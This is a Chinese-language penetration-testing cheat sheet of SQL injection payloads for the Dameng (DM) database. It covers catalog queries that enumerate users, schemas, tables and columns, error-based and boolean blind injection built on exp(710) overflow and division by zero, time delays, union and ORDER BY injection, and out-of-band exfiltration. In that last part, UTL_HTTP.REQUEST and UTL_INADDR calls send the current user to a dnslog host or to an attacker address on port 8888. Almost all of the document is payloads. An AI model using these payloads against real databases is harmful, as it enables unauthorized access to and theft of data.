记一次达梦数据库DMSQL-SQL注入小记

select user         -- 返回当前用户，默认是SYSDBA
select user()       -- 同上
select cur_database     -- 返回当前库名，默认是DAMENG
select cur_database()   -- 同上
select  1                       -- select语句后面可以不跟表名，存在默认表dual，可以接from dual
select 1 from dual where 1=1 && 1=1     -- &&可以代替and，但||不能代替or

SELECT 1; -- 单行注释
select 1/*aaa*/from dual    -- 支持/**/多行注释

md5(1)                          -- 返回 0xC4CA4238A0B923820DCC509A6F75849B，返回对应MD5值，前面加了0x
exp(if(1=1,710,1))
exp(710)                -- 返回整数溢出错误，使用这种方式可以强制BOOL盲注

ASCII(str)          返回字符串第一个字符的ASCII值, ASCII('a') = 97
char(num)               返回参数num对应的ASCII字符，
chr(num)                同上，CHR(97) = a
HEX(str)                返回16进制字符串形式, hex(12) = 3132
UNHEX(str)          返回对应的字符串，unhex(3132) = 12

substring('1234',2,1)           -- 同substr函数
substr('1234',2,1)              -- 返回2，第二个参数从第几位开始取值，第三个参数代表截图多少位
-- 多种格式 SUBSTR(str,pos)、SUBSTR(str FROM pos)、SUBSTR(str,pos,len)、SUBSTR(str FROM pos FOR len), 如 substr('1234' from 2 for 1) = 2

left('123456', 3)                   -- 返回123，第二个参数代表返回左边几位的字符
right('123456', 3)              -- 返回456，第二个参数代表返回右边几位的字符

||                                                              -- 将左右两侧字符串进行连接
CONCAT(str1,str2...)                                    -- 将多个字符串合并为一个字符串
CONCAT_WS(separator,str1,str2...)               -- 通过分隔符separator将字符串连接在一起
WM_CONCAT(column_name)                          -- 类似 GROUP_CONCAT(...)，将某一列中的多个字符串按照一定顺序拼接成一个大的字符串，通常用于分组后的字符串拼接
LISTAGG(column_name, separator)                 -- 和 WM_CONCAT 类似，也是用于将分组后的列值进行拼接，并且提供了更多的控制选项，如指定分隔符等。

LENGTH(str)     -- 返回字符串的长度
len(str)            -- 返回字符串的长度
LOWER(str)      -- 将字符串字母全部转成小写。同：LCASE(str)。
UPPER(str)      -- 将字符串字母全部转成大写。同：UCASE(str)。
TO_CHAR(date/time_value, 'format')      -- 将日期、时间、数字等类型的数据转换为字符类型
TO_NUMBER(char_value, 'format')          -- 将字符类型的数据转换为数字类型
TO_DATE(char_value, 'format')                -- 将字符类型的数据转换为日期类型。

-- 查看数据库版本
SELECT banner FROM v$version;           -- 注意：返回是多行
SELECT banner FROM v$version limit 0,1;
SELECT WM_CONCAT(banner) FROM v$version     -- 在一行中显示
SELECT LISTAGG(banner, '， ') FROM v$version;    -- 在一行中显示，高版本可用
-- 获取当前用户、当前数据库
select user
select user()
SELECT user FROM DUAL;
select cur_database
-- 获取所有用户名
select USERNAME from SYS.ALL_USERS
select WM_CONCAT(USERNAME) from SYS.ALL_USERS

SELECT NAME, TYPE, VALUE FROM V$PARAMETER;

NAME                                    VALUE
SYSTEM_PATH             /home/dmdba/data/DAMENG
CONFIG_PATH             /home/dmdba/data/DAMENG
TEMP_PATH                   /home/dmdba/data/DAMENG
BAK_PATH                    /home/dmdba/data/DAMENG/bak
DFS_PATH                    $/DAMENG
INSTANCE_NAME           DMSERVER
INSTANCE_ADDR
PORT_NUM                    5236
SVR_LOG_NAME            SLOG_ALL
TRACE_PATH              /home/dmdba/data/DAMENG/trace
BCT_PATH                    /home/dmdba/data/DAMENG

SELECT VALUE FROM V$PARAMETER WHERE NAME = 'SYSTEM_PATH';
SELECT NAME, VALUE FROM V$PARAMETER WHERE name LIKE '%INSTANCE%'

select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCH'

select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCHOBJ' and SUBTYPE$='UTAB' and SCHID=150995949

select NAME,TYPE$,DEFVAL from SYS.SYSCOLUMNS where ID=1078

select USERNAME from SYS.ALL_USERS

select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='SYSDBA' and OBJECT_TYPE='SCH'

select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='OTHER' and OBJECT_TYPE='TABLE'

select OWNER,TABLE_NAME,SCHEMA_NAME,COLUMN_NAME from SYS.ALL_COL_COMMENTS where SCHEMA_NAME='OTHER' and TABLE_NAME='xxxxxx'

order by num
 union select 1,2,3...          -- 注意列数和类型要相同

select 1 from dual where 1=1/0

SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=1/if(len(user)=6,1,0) ORDER BY id DESC;

select exp(710)
select exp(if(1=1,710,1))           -- 数据溢出
select exp(if(len(user)=6,710,1))

SELECT *  FROM t1 where rownum<5 AND 1=exp(if(len(user)=6,710,0)) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 ORDER BY id,exp(if(len(user)=6,711,0)) DESC;
SELECT *  FROM t1 where rownum<5 ORDER BY id DESC, exp(if(len(user)=6,710,0));

if(expr，参数1，参数2) -- expr成立时，返回参数1的值;不成立时，返回参数2的值
CASE WHEN exp THEN state1 ELSE state2 END       -- 同IF
DECODE(expr, search1, result1 [, search2, result2,...][, default_result])  -- 类似 switch case, 如果 expr=search1，则返回 result1，否则返回default_result
IFNULL(expr1,expr2)                 -- 如果 expr1 不为 NULL，则返回 expr1，否则返回 expr2
NULLIF(expr1,expr2)                 -- 若expr1与expr2不同，则返回expr1，否则返回NULL

if(1=ascii(substr('123456',2,1)),2, 1)      -- 综合使用，盲注必备
CASE WHEN len(user)=6 THEN 1 ELSE 0 END
DECODE(len(user),6,1,0)                         -- 判断len(user)=6是否成立，成立返回1，否则返回0

SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=if(len(user)=6,1,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=(case when len(user)=4 then 1 else 0 end) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=decode(len(user),6 ,1,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=IFNULL(len(user)=6,0) ORDER BY id DESC;
SELECT *  FROM t1 where rownum<5 AND 1=1 AND 1=NULLIF(len(user)=6,0) ORDER BY id DESC;

sleep(n)                -- 休眠n秒，不能和select 一起用，语法错误，失去价值
exec  sleep 5       -- 延时5s
dbms_pipe.receive_message(('a'),2)              -- 可以延时

SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;      -- 如果反查很慢，可能可以
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual;      -- 如果正查很慢
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;         -- 如果发送TCP包被拦截或者很慢

SELECT UTL_INADDR.get_host_address('google.com') FROM dual;   -- priv
SELECT UTL_INADDR.get_host_address((select user)||'.xxx.dnslog');

SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://xxx.dnslog?'||(select user)) from dual;
select utl_http.request('http://192.168.0.100:8888/?'||(select user)) from dual;

ORDER BY id^(if(1=2,1,2)
ORDER BY id^(if(len(user)=6,1,2))

SELECT * FROM t1 where rownum<5 ORDER BY id^(if(1=2,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id^(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id&(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id|(if(len(user)=6,1,2)) DESC;

(SELECT * FROM t1 where rownum<5 ORDER BY id) union (select 1,2,user);
(SELECT * FROM t1 where rownum<5 ORDER BY id,null) union (select 1,2,user);

SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY id limit 0,20

SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY (select 1 from dual where 1=1/(case when len(user)=6 then 1 else 0 end)) LIMIT 0,20